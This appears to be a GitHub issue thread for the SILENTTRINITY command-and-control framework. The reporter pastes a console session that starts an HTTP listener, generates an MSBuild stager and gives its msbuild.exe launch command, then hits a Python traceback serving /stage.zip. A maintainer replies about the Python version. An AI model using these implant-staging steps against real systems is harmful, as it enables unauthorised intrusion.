### ISSUE TITLE
ERROR

### ISSUE THREAD

**Issue by demonsec666** [byt3bl33d3r/SILENTTRINITY#36]
![image](https://user-images.githubusercontent.com/24873495/51290897-24415000-1a40-11e9-8e1b-94ae0ec6b7fb.png)

ST ≫ listeners                                                                                               
ST (listeners) ≫ use http                                                                                    
ST (listeners)(http) ≫ set BindIP 10.0.0.113                                                                 
ST (listeners)(http) ≫ set Port 5000                                                                         
ST (listeners)(http) ≫ start                                                                                 
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://10.0.0.113:5000 (CTRL + C to quit)                                 
ST (listeners)(http) ≫ stagers                                                                               
ST (stagers) ≫ list                                                                                          
+Available+--------------------------------------+
| Name    | Description                          |
+---------+--------------------------------------+
| wmic    | Stage via wmic XSL execution         |
+---------+--------------------------------------+
| msbuild | Stage via MSBuild XML inline C# task |
+---------+--------------------------------------+
ST (stagers) ≫ use msbuild                                                                                   
ST (stagers)(msbuild) ≫ options                                                                              
+-------------+----------+-------+-------------+
| Option Name | Required | Value | Description |
+-------------+----------+-------+-------------+
ST (stagers)(msbuild) ≫ generate http                                                                        
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
ST (stagers)(msbuild) ≫ [2019-01-17 10:08:16,259] ERROR in app: Exception on request GET /stage.zip
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/quart/app.py", line 1436, in handle_request
    return await self.full_dispatch_request(request_context)

**Comment by davidtavarez** [comment]
Which Python version are you using? Did you follow this guide? https://github.com/byt3bl33d3r/SILENTTRINITY/wiki/Setting-up-your-development-environment

**Comment by demonsec666** [comment]
thx :+1:
